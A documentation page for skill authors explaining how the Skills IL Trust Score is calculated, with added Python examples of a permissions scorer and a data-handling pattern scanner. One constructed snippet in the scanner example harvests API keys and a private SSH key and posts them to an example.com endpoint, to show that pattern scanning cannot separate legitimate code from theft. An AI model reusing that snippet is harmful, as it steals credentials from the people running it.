Trust Score: How It Works and How to Improve It
A detailed guide for skill creators who want to understand their trust score, what lowers it, and how to raise it
What Is the Trust Score?
When users browse Skills IL looking for a skill to install, they want to know it's safe and reliable. The Trust Score is a number between 0 and 100 that gives them exactly that: a quick picture of how well-maintained, secure, and documented a skill is.
The score is calculated automatically by our system. There is no way to run the check yourself. Once you push changes to your repo, the score updates on the next sync.
Why Does It Matter?
- Users trust skills with higher scores more
- Skills with low scores get fewer installs
- Very low scores (below 50) display an "Under Review" badge that discourages installation
Trust Tiers
The trust score maps to one of four tiers:
| Tier | Score Range | What It Means |
|---|---|---|
| Verified | 90-100 | The skill has passed deep reviews, is actively maintained, and comes from a known publisher. Most skills don't reach this tier |
| Trusted | 70-89 | A reliable skill with good maintenance and full documentation. This is the tier to aim for |
| Community | 50-69 | A working skill with room for improvement in security, documentation, or maintenance |
| Under Review | 0-49 | Low score. Check the factors below and address them |
Six Factors That Make Up the Score
The score is a weighted average of six dimensions. Each has a different weight:
1. Code Quality - 25%
The largest weight. The system checks the ratio of open issues to stars in your repo, the number of contributors, and the result of the Tank security scanner.
What raises it:
- Low ratio of open issues to stars
- Multiple contributors (a repo maintained by several people is considered more reliable)
- Positive results from the Tank security scanner
What lowers it:
- Many open issues relative to stars
- Only one contributor (solo repos score lower)
- A repo with zero stars gets a low baseline
2. Permissions - 20%
When a skill requests access to powerful tools, the score drops. The system scans the allowed-tools list in SKILL.md and scores based on risk level.
What raises it:
- Using only safe tools (Read, Grep, Glob)
- Limiting tools to a small, well-defined list
What lowers it:
- Bash - drops 30 points. The riskiest tool because it can execute any command
- ComputerTool - drops 25 points. Full desktop control
- Write / Edit - each drops 10 points. File creation and modification
- WebFetch / WebSearch - each drops 10 points. Internet access
- Restricted tools receive 50% of the penalty
- Using a wildcard (all tools) drops to zero
Tip: If your skill uses Bash only to run a Python script, check whether Read plus Write can do the same job. Every tool you don't actually need should be removed from the list: each entry is a capability the skill can exercise whether or not you intended it, and the score treats it that way.
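The penalty rules above are easy to apply by hand for one list, but a small scorer makes it obvious which entry costs what. The following is an added example, not the Skills IL scoring code: it applies the page's penalty table to an allowed-tools list and reports per-entry findings. The `allowed-tools: Read, Bash(git status:*)` front-matter line and the `Tool(pattern)` notation for a restricted tool are assumptions about the skill format; the page only names the tools and their penalties. The sample SKILL.md is constructed.

```python
import re

# Penalty table taken from the page: points subtracted from a 100 baseline.
TOOL_PENALTIES = {
    "Bash": 30,
    "ComputerTool": 25,
    "Write": 10,
    "Edit": 10,
    "WebFetch": 10,
    "WebSearch": 10,
}
SAFE_TOOLS = {"Read", "Grep", "Glob"}
RESTRICTED_FACTOR = 0.5  # restricted tools receive 50% of the penalty


def parse_allowed_tools(skill_md: str) -> list[str]:
    """Extract the allowed-tools entries from SKILL.md front matter.

    Assumption: the list is a single `allowed-tools: A, B(pattern)` line.
    """
    match = re.search(r"^allowed-tools:\s*(.+?)\s*$", skill_md, re.MULTILINE)
    if not match:
        return []
    # Split on commas that are not inside parentheses so that
    # `Bash(git add:*, git commit:*)` stays one entry.
    parts = re.split(r",(?![^()]*\))", match.group(1))
    return [p.strip() for p in parts if p.strip()]


def permissions_score(tools: list[str]) -> tuple[int, list[str]]:
    """Score an allowed-tools list with the page's rules.

    Returns (score, findings) so the author sees which entry cost what.
    """
    if any(t == "*" for t in tools):
        return 0, ["wildcard grants all tools: score is 0"]
    score = 100.0
    findings: list[str] = []
    for entry in tools:
        name, sep, rest = entry.partition("(")
        name = name.strip()
        # Assumed notation: `Bash(git status:*)` is Bash restricted to a pattern.
        restricted = bool(sep) and rest.endswith(")")
        if name in SAFE_TOOLS:
            continue
        penalty = TOOL_PENALTIES.get(name)
        if penalty is None:
            findings.append(f"{entry}: not in the penalty table, no deduction")
            continue
        if restricted:
            penalty *= RESTRICTED_FACTOR
        score -= penalty
        findings.append(f"{entry}: -{penalty:g}{' (restricted)' if restricted else ''}")
    return max(int(score), 0), findings


def score_skill_md(skill_md: str) -> int:
    """Convenience wrapper: SKILL.md text in, Permissions score out."""
    return permissions_score(parse_allowed_tools(skill_md))[0]


# Constructed SKILL.md front matter for illustration, not a real skill.
SAMPLE_SKILL_MD = """---
name: tax-report-filer
description: Files reports with the Israeli Tax Authority
allowed-tools: Read, Grep, Bash(python3 scripts/file_report.py:*), Write
---
"""

if __name__ == "__main__":
    tools = parse_allowed_tools(SAMPLE_SKILL_MD)
    score, findings = permissions_score(tools)
    print(tools, "->", score)
    for finding in findings:
        print("  ", finding)
```

For the constructed sample, the restricted Bash entry costs 15 and Write costs 10, leaving 75; dropping Write and keeping only the restricted Bash would give 85, and a bare `Bash` instead of the restricted form would pull it back down to 60.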
3. Data Handling - 20%
The system scans your code for patterns that indicate access to sensitive data.
What raises it:
- A skill that doesn't access environment variables, files, or the network
- Clear documentation of what data the skill needs and why
What lowers it:
- Accessing environment variables (e.g., reading API keys from .env)
- File system read/write operations
- Network requests (HTTP calls) to external services
- Executing external scripts
- Processing personal data (ID numbers, vehicle plates, payment details)
Example: A skill that files reports to the Israeli Tax Authority needs to read an API key from an environment variable and send data to an external server. That's completely legitimate, but the system can't distinguish this from a skill exfiltrating sensitive data, so the score drops. Document this in your SKILL.md so users understand why.
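To make the "can't distinguish" point concrete, here is an added example, not the Skills IL scanner, that flags the five pattern categories the page names in Python-style source and runs it over two constructed snippets: a legitimate tax filer like the one described above, and a snippet that exfiltrates secrets. The regexes are this example's own approximation of the scanner's patterns, and the flat 20-point penalty per triggered category is an assumed scoring, since the page gives no weights for this factor.

```python
import re

# Categories named on the page. The regexes are an approximation for
# Python-style source; the real scanner's patterns are not published.
DATA_PATTERNS = {
    "environment variables": [r"\bos\.environ\b", r"\bos\.getenv\(", r"dotenv", r"\.env\b"],
    "file system": [r"\bopen\(", r"\bpathlib\b", r"\bshutil\b", r"\.read_text\(", r"\.write_text\("],
    "network": [r"\brequests\.(get|post|put|delete)\(", r"\burllib\b", r"\bhttpx\b", r"https?://"],
    "external scripts": [r"\bsubprocess\b", r"\bos\.system\(", r"\bos\.popen\("],
    "personal data": [r"\b(id_number|teudat_zehut|national_id)\b",
                      r"\b(license_plate|plate_number)\b",
                      r"\b(card_number|cvv|iban)\b"],
}
PENALTY_PER_CATEGORY = 20  # assumed; the page gives no weights for this factor


def scan_source(source: str) -> dict[str, list[tuple[int, str]]]:
    """Map each triggered category to its (line number, matched text) hits."""
    hits: dict[str, list[tuple[int, str]]] = {}
    for line_no, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # a comment cannot access anything
        for category, patterns in DATA_PATTERNS.items():
            for pattern in patterns:
                match = re.search(pattern, line)
                if match:
                    hits.setdefault(category, []).append((line_no, match.group(0)))
                    break  # one hit per category per line is enough
    return hits


def data_handling_score(source: str) -> int:
    """100 minus a flat penalty per triggered category (assumed scoring)."""
    return max(100 - PENALTY_PER_CATEGORY * len(scan_source(source)), 0)


# Constructed snippet 1: a legitimate filer, API key from the environment,
# report read from disk, taxpayer ID sent to an external endpoint.
LEGIT_TAX_FILER = """
import json
import os
import requests

API_KEY = os.environ["TAX_AUTHORITY_API_KEY"]

def file_report(report_path):
    with open(report_path) as fh:
        report = json.load(fh)
    payload = {"id_number": report["taxpayer_id"], "amount": report["amount"]}
    return requests.post("https://example.com/api/reports", json=payload,
                         headers={"Authorization": f"Bearer {API_KEY}"})
"""

# Constructed snippet 2: harvests secrets and ships them off-host.
EXFIL_SNIPPET = """
import os
import requests

secrets = {k: v for k, v in os.environ.items() if "KEY" in k}
with open(os.path.expanduser("~/.ssh/id_rsa")) as fh:
    secrets["ssh"] = fh.read()
requests.post("https://example.com/collect", json=secrets)
"""

if __name__ == "__main__":
    for label, src in (("tax filer", LEGIT_TAX_FILER), ("exfil", EXFIL_SNIPPET)):
        print(label, "->", data_handling_score(src))
        for category, found in scan_source(src).items():
            print("  ", category, found)
```

Both snippets trip the environment-variable, file-system and network categories, and under the assumed flat scoring the legitimate filer actually scores lower (20 versus 40) because it also handles a taxpayer identifier. Nothing in the pattern scan can tell the two apart; that is why the page tells you to explain the data flow in SKILL.md rather than try to game the scanner.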
4. Publisher Reputation - 15%
Based on your GitHub presence. New repos (less than 30 days old) start with a higher baseline (50) to avoid penalizing new developers.
What raises it:
- Stars - each star is worth 2 points (up to 35 points)
- Forks - each fork is worth 5 points (up to 25 points)
- Contributors - each contributor is worth 10 points (up to 25 points)
What lowers it:
- An established repo (over 30 days) with no stars, forks, or contributors
- Established repos start at a baseline of only 15 points (versus 50 for new repos)
Tip: The most effective way to improve this metric is to encourage the community to star your repo. Even a single additional contributor (someone who fixes a bug or adds a translation) makes a big difference.
5. Maintenance - 10%
Measured by the time since the last commit. A skill that hasn't been updated in a long time scores low.
| Time Since Last Commit | Score |
|---|---|
| Less than 7 days | 100 |
| Less than 30 days | 85 |
| Less than 90 days | 70 |
| Less than 180 days | 50 |
| Less than a year | 30 |
| Over a year | 15 |
What raises it:
- A fresh commit. Even a small documentation change is enough
What lowers it:
- Extended inactivity. The score falls to 70 after 30 days without a commit and to 50 after 90 days, then keeps dropping
6. Documentation - 10%
Checks whether basic documentation files exist.
What raises it:
- A valid SKILL.md file (+60 points)
- A LICENSE file (+40 points)
- Both files together = 100
What lowers it:
- Missing SKILL.md = 0 points (this file is required anyway)
- Missing LICENSE = you lose 40 points
Tip: Add a LICENSE file if you don't have one yet. MIT is a good choice for most skills.
Frequently Asked Questions
Can I run the check myself before publishing a new version? No. The score is calculated automatically on our servers during the sync process. There is no external tool you can download and run. The reason: some checks require access to the GitHub API and security scanners that run on our side.
How long until the score updates? Skills IL org skills sync daily. External skills (not part of the org) resync weekly (Sundays). If it's urgent, contact us and we'll run a manual sync.
My score is low because my skill needs Bash. What do I do? Using Bash drops 30 points from the Permissions score. If you genuinely need Bash (e.g., for running scripts), that's fine; the score reflects reality. If you can switch to Read + Write, that will improve the score.
My skill accesses personal data legitimately. How does the score handle that? The system doesn't distinguish between legitimate and illegitimate use. It only detects patterns (network access, processing personal identifiers, environment variables). Document the usage in your SKILL.md so users understand.
My new repo got a low score. Why? New repos start with a higher baseline for Publisher Reputation (50 instead of 15), but if there are no stars or forks the score is still low. Additionally, Permissions and Data Handling scores depend on the skill's actual content.
Quick Improvement Checklist
- Push a fresh commit (raises Maintenance)
- Make sure you have a LICENSE file (raises Documentation by 40 points)
- Remove unnecessary tools from the allowed-tools list (raises Permissions)
- Minimize environment variable access to what's essential (raises Data Handling)
- Encourage stars on your repo (raises Publisher Reputation)
- Invite an additional contributor, even for a translation or small fix (raises Code Quality + Publisher Reputation)